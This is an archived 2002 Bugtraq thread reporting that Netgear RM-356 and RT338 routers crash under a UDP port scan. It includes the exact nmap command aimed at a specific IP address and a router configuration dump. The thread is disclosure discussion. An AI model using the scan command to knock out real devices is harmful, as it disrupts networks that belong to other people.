Bugtraq mailing list archives
Re: Remote DoS in Netgear RM-356
From: Simple Nomad <thegnome () nmrc org>
Date: Fri, 15 Feb 2002 14:11:06 -0500 (EST)
My Netgear RT338, which is an ISDN router, falls over with a udp scan. It does clear on its own, but not before dropping the connection. Interestingly enough SNMP is not running on it -- it just choked on the scan, but seems to handle a tcp scan ok.

This would suggest that the problem may lie with the filtering code (most of the SOHO Netgear devices have some simple acls for filtering traffic) or with the buffers that handle the packets.

My testing was limited -- I did not test from the outside because the udp scans fuck up some of the equipment at my ISP ;-) but it did drop the connection with a udp scan from the inside. I suspect all the RT and RM devices from Netgear may fall into this category.

- Simple Nomad - if we were priests -
- thegnome () nmrc org - we would hack -
- thegnome () razor bindview com - the mind of god -

On Fri, 15 Feb 2002, Ben Ryan wrote:
g'day all; found a denial of service in the IP stack of the Netgear RM-356. This is your typical `internet gateway in a box'. Small businesses love 'em.

this isn't exactly 'end of the internet' stuff, so I haven't bothered to do any coochie-coo vendor-informed stuff. Write bad code and sell it, stand up and be counted for your mistakes. Even simple testing would have uncovered this.

Using lx252 and nmap-254b30, I performed a udp scan against the netgear nat box, this device has a V90 modem WAN interface. cmd line was:

    snuff# nmap -sU 210.9.238.103 -T5

It seems to be 161/UDP that's vulnerable... what a coincidence :) TCP connect() scans seem to be ok.

Upon receipt of the nmap probe, the box does a crashdump to console. Perhaps this is an overflow? IANAasmdev :)

All your RM-356 are belong to us :)

    Menu 24.2.1 - System Maintenance - Information

    Name: *******_netgear
    Routing: IP
    RAS F/W Version: V2.21(I.03) | 3/30/2000
    MODEM 1 F/W Version: V2.210-V90_2M_DLS
    Country Code: 244

    LAN
    Ethernet Address: 00:a0:c5:e3:**:**
    IP Address: 192.168.0.1
    IP Mask: 255.255.255.0
    DHCP: Server

    Boot Module Version : 4.40. Built at Wed Feb 23 14:00:29 2000

________.-~-.________
Ben Ryan, MCP
Network Engineer
Lansys Technologies
Bendigo, Victoria Australia
Phone +61-[0]417 502061
email: ben () bssc edu au
URL: http://thrasher.impulse.net.au/index.htm